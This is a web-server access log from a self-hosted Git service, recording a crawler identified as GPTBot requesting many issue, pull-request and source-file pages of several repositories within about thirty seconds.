"https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:19:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11214] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:19:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:19:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj?display=rendered" [Client 74.7.227.38] [Length 11142] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:19:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md?display=rendered" [Client 74.7.227.38] [Length 13816] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" +[17/Feb/2026:19:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md?display=source" [Client 74.7.227.38] [Length 15361] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" +[17/Feb/2026:19:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11549] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:19:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13575] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13571] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13568] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" 